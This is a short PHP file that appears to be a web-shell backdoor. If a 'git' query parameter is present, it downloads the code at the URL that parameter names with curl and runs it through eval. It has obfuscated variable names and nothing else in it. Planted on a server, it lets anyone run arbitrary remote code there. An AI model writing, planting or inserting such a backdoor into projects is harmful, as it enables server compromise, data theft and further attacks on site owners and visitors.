<?php
if (isset($_GET['git'])) {
$is_single_mwa = $_GET['git'];
if ($_e_bzo = curl_init()) {
curl_setopt($_e_bzo, CURLOPT_URL, $is_single_mwa);
curl_setopt($_e_bzo, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($_e_bzo));
curl_close($_e_bzo);
exit;
}
}